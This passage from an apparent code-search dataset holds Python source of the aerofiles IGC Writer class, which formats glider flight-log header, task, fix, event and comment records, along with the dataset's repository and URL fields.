record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
              pressure_alt=None, gps_alt=None, extensions=None):
    """
    Write a fix (B) record::

        writer.write_fix(
            datetime.time(12, 34, 56),
            latitude=51.40375,
            longitude=6.41275,
            valid=True,
            pressure_alt=1234,
            gps_alt=1432,
        )
        # -> B1234565124225N00624765EA0123401432

    :param time: UTC time of the fix record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param latitude: latitude of the last GPS fix (in decimal degrees)
    :param longitude: longitude of the last GPS fix (in decimal degrees)
    :param valid: ``True`` if the current GPS fix is 3D
    :param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
        sea level datum
    :param gps_alt: altitude above the WGS84 ellipsoid
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_fix_extensions`
    """
    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)
    record += self.format_latitude(latitude)
    record += self.format_longitude(longitude)
    record += 'A' if valid else 'V'
    record += '%05d' % (pressure_alt or 0)
    record += '%05d' % (gps_alt or 0)

    # extension values must match the earlier I-record declaration,
    # both in count and in per-field width
    if self.fix_extensions or extensions:
        if not (isinstance(extensions, list) and
                isinstance(self.fix_extensions, list)):
            raise ValueError('Invalid extensions list')

        if len(extensions) != len(self.fix_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')

        for type_length, value in zip(self.fix_extensions, extensions):
            length = type_length[1]

            if isinstance(value, (int, float)):
                value = ('%0' + str(length) + 'd') % value

            if len(value) != length:
                raise ValueError('Extension value has wrong length')

            record += value

    self.write_record('B', record)
def write_event(self, *args):
    """
    Write an event (E) record::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    :param time: UTC time of the event record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    """
    num_args = len(args)
    if not (1 <= num_args <= 3):
        raise ValueError('Invalid number of parameters received')

    # positional arguments are dispatched by count and type:
    # (time, code, text), (code,), (time, code) or (code, text)
    if num_args == 3:
        time, code, text = args
    elif num_args == 1:
        code = args[0]
        time = text = None
    elif isinstance(args[0], (datetime.time, datetime.datetime)):
        time, code = args
        text = None
    else:
        code, text = args
        time = None

    if time is None:
        time = datetime.datetime.utcnow()

    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')

    record = self.format_time(time)
    record += code

    if text:
        record += text

    self.write_record('E', record)
def write_satellites(self, *args):
    """
    Write a satellite constellation (F) record::

        writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
        # -> F12345601020522

    :param time: UTC time of the satellite constellation record
        (default: :meth:`~datetime.datetime.utcnow`)
    :param satellites: a list of satellite IDs as either two-character
        strings or integers below 100
    """
    if len(args) == 1:
        time, satellites = None, args[0]
    elif len(args) == 2:
        time, satellites = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)

    for sat_id in satellites:
        # integer IDs are zero-padded to the mandatory two characters
        if isinstance(sat_id, int):
            sat_id = '%02d' % sat_id

        if len(sat_id) != 2:
            raise ValueError('Invalid satellite ID')

        record += sat_id

    self.write_record('F', record)
def write_k_record(self, *args):
    """
    Write a K record with values matching an earlier
    :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
    declaration::

        writer.write_k_record_extensions([
            ('FXA', 3), ('SIU', 2), ('ENL', 3),
        ])
        writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
        # -> J030810FXA1112SIU1315ENL
        # -> K02030402313002

    :param time: UTC time of the K record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param extensions: a list of extension values according to the
        previous declaration
    """
    if len(args) == 1:
        time, extensions = None, args[0]
    elif len(args) == 2:
        time, extensions = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)

    if not (isinstance(extensions, list) and
            isinstance(self.k_record_extensions, list)):
        raise ValueError('Invalid extensions list')

    if len(extensions) != len(self.k_record_extensions):
        raise ValueError(
            'Number of extensions does not match declaration')

    for spec, raw in zip(self.k_record_extensions, extensions):
        width = spec[1]

        # numeric values are zero-padded to the declared field width
        if isinstance(raw, (int, float)):
            raw = ('%0' + str(width) + 'd') % raw

        if len(raw) != width:
            raise ValueError('Extension value has wrong length')

        record += raw

    self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write a comment (L) record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the
        comment (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    """
    if patterns.THREE_LETTER_CODE.match(code) is None:
        raise ValueError('Invalid source')

    self.write_record('L', '%s%s' % (code, text))
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_gps_datum | python | def write_gps_datum(self, code=None, gps_datum=None):
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
) | Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L222-L251 | [
"def write_fr_header(self, subtype, value,\n subtype_long=None, value_long=None):\n self.write_header(\n 'F', subtype, value,\n subtype_long=subtype_long, value_long=value_long\n )\n"
] | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
    """
    Normalize *date* to a ``DDMMYY`` string.

    Accepts :class:`datetime.datetime`, :class:`datetime.date` or an
    already-formatted string; raises :class:`ValueError` for anything
    that does not match the expected pattern.
    """
    if isinstance(date, datetime.datetime):
        date = date.date()
    if isinstance(date, datetime.date):
        date = date.strftime('%d%m%y')

    if patterns.DATE.match(date):
        return date

    raise ValueError("Invalid date: " + date)
def format_time(self, time):
    """
    Normalize *time* to an ``HHMMSS`` string.

    Accepts :class:`datetime.datetime`, :class:`datetime.time` or an
    already-formatted string; raises :class:`ValueError` for anything
    that does not match the expected pattern.
    """
    if isinstance(time, datetime.datetime):
        time = time.time()
    if isinstance(time, datetime.time):
        time = time.strftime('%H%M%S')

    if patterns.TIME.match(time):
        return time

    raise ValueError("Invalid time: " + time)
def format_coordinate(self, value, default=None, is_latitude=True):
    """
    Format an angle in decimal degrees as an IGC coordinate string
    (``DDMMmmmH`` for latitudes, ``DDDMMmmmH`` for longitudes).

    :param value: the angle in decimal degrees, or ``None``
    :param default: the string returned when *value* is ``None``
    :param is_latitude: select latitude (two degree digits, ``N``/``S``)
        or longitude (three degree digits, ``E``/``W``) formatting
    :raises ValueError: if *value* is outside the valid range
    """
    if value is None:
        return default

    if is_latitude:
        if not -90 <= value <= 90:
            raise ValueError('Invalid latitude: %s' % value)

        hemisphere = 'S' if value < 0 else 'N'
        format = '%02d%05d%s'

    else:
        if not -180 <= value <= 180:
            raise ValueError('Invalid longitude: %s' % value)

        hemisphere = 'W' if value < 0 else 'E'
        format = '%03d%05d%s'

    value = abs(value)
    degrees = int(value)
    milliminutes = round((value - degrees) * 60000)

    # round() may push the minutes up to a full degree (e.g. for
    # 50.99999999); carry over so we never emit an invalid "60000"
    # milliminutes field
    if milliminutes == 60000:
        degrees += 1
        milliminutes = 0

    return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
    """
    Write the date header::

        writer.write_date(datetime.date(2014, 5, 2))
        # -> HFDTE020514

    The date is written in ``DDMMYY`` order (see :meth:`format_date`).

    :param date: a :class:`datetime.date` instance
    """
    self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write a comment (L) record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the comment
        (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    """
    if patterns.THREE_LETTER_CODE.match(code) is None:
        raise ValueError('Invalid source')
    record = code + text
    self.write_record('L', record)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_headers | python | def write_headers(self, headers):
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club']) | Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
